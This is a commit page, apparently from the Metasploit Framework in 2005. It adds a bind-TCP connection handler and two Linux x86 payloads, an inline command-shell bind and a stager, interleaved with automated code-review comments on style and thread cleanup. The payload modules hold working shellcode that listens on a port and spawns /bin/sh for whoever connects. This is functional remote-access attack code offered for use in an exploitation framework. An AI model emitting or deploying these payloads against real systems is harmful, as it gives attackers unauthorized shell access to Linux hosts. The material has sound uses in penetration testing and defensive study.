bind tcp stager/inline for linux

git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Miller 2005-07-17 07:43:24 +00:00
parent 46c2cd2ac1
commit cc32a21386
6 changed files with 213 additions and 2 deletions


@ -117,7 +117,7 @@ module Handler
# The amount of time to wait for a session to come in.
#
def wfs_delay
1
2
end
#
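Review bot: wfs_delay still returns a bare number whose unit the comment "The amount of time to wait for a session to come in." never states, and neither the comment nor the commit message says why the value changes; state both next to the method, e.g. `# <unit> to wait for a session to come in; 2 because <reason>` with the placeholders filled in. The rendered page shows `1` and `2` without markers, so which one is the new value is inferred from the diffstat rather than visible here.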


@ -0,0 +1,112 @@
module Msf
module Handler
###
#
# BindTcp
# -------
#
# This module implements the Bind TCP handler. This means that
# it will attempt to connect to a remote host on a given port for a period of
# time (typically the duration of an exploit) to see if a the payload has
# started listening. This can tend to be rather verbose in terms of traffic
# and in general it is preferable to use reverse payloads.
#
###
module BindTcp
include Msf::Handler
def self.handler_type
return "bind_tcp"
end
def initialize(info = {})
super
register_options(
[
Opt::RHOST,
Opt::LPORT(4444)
], Msf::Handler::BindTcp)
self.conn_threads = []
end
#
# No setup to speak of
#
def setup_handler
end
#
# Kills off the connection threads if there are any hanging around.
#
def cleanup_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an outbound connection to become established.
#
def start_handler
listener_thread = Thread.new {
client = nil
print_status("Started bind handler")
# Keep trying to connect
callcc { |ctx|
while true
begin
client = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['LPORT'].to_i,
'Comm' => comm)
rescue Rex::ConnectionRefused
# Connection refused is a-okay
rescue
wlog("Exception caught in bind handler: #{$!}")
end
ctx.call if (client)
# Wait a second before trying again
Rex::ThreadSafe.sleep(0.5)
end
}
# Valid client connection?
if (client)
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << Thread.new {
begin
handle_connection(client)
rescue
elog("Exception raised from BindTcp.handle_connection: #{$!}")
end
}
end
}
end
#
# Nothing to speak of.
#
def stop_handler
end
protected
attr_accessor :conn_threads
end
end
end
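Review bot: The polling thread created in start_handler is assigned to the local `listener_thread` and then dropped, so neither stop_handler (empty) nor cleanup_handler (which kills only conn_threads) can terminate it; if no listener ever appears on RHOST:LPORT the thread keeps retrying the connect every 0.5 s for as long as the process lives. Store it and kill it on teardown: `self.listener_thread = Thread.new {` in start_handler, `listener_thread.kill if listener_thread` in stop_handler, and `attr_accessor :conn_threads, :listener_thread` in the protected section. Separately, `callcc` is a heavy way to leave the `while true` loop; `loop do ... break if client ... end` expresses the same control flow without continuations. The comment "Wait a second before trying again" also disagrees with the `Rex::ThreadSafe.sleep(0.5)` that follows it.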


@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
#
##
#
# Creates the client using the supplied hash
#
def self.create(hash)
self.create_param(Rex::Socket::Parameters.from_hash(hash))
end
#
# Wrapper around the base socket class' creation method that automatically
# sets the parameter's protocol to TCP
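Review bot: The header comment on the new `self.create(hash)` says only "using the supplied hash" and names none of the keys, while the one caller added in this commit (the BindTcp handler) relies on 'PeerHost', 'PeerPort' and 'Comm'; document the contract, e.g. `# Creates a TCP client from a hash of parameter names ('PeerHost', 'PeerPort', 'Comm' and the other keys Rex::Socket::Parameters.from_hash understands).` The hunk ends inside the comment of the following method, whose body is outside this view.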


@ -0,0 +1,44 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Singles
module Linux
module X86
module ShellBindTcp
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => [ 'skape', 'vlad902' ],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 0x14, 'n' ],
},
'Payload' =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
"\x89\xe1\xcd\x80"
}
))
end
end
end end end end end
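Review bot: The `'LPORT' => [ 0x14, 'n' ]` offset is a bare magic number coupled to the shellcode string, and nothing records which bytes it points at; byte 20 of the string is the `\xbf\xbf` pair, so a comment such as `# 0x14 = offset of the \xbf\xbf port placeholder, written as a 16-bit network-order value ('n')` beside the offset would let a maintainer re-check it after any edit to the bytes. The same applies to the Msf::Payloads::Stagers::Linux::X86::BindTcp stager added in this commit, whose leading bytes are identical and which uses the same offset.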


@ -8,7 +8,7 @@ module Singles
module Linux
module X86
module Shell
module ShellReverseTcp
include Msf::Payload::Single


@ -0,0 +1,48 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
module Msf
module Payloads
module Stagers
module Linux
module X86
###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module BindTcp
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Version' => '$Revision$',
'Description' => 'Listen for a connection',
'Author' => 'skape',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 0x14, 'n' ],
},
'Payload' =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
}
))
end
end
end end end end end
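Review bot: `'Author' => 'skape'` is passed as a bare String here while the ShellBindTcp single added in the same commit passes `'Author' => [ 'skape', 'vlad902' ]`; presumably merge_info tolerates both (its handling is not visible on this page), but using one shape in both new modules, `'Author' => [ 'skape' ],`, keeps consumers of the info hash from having to handle both a String and an Array.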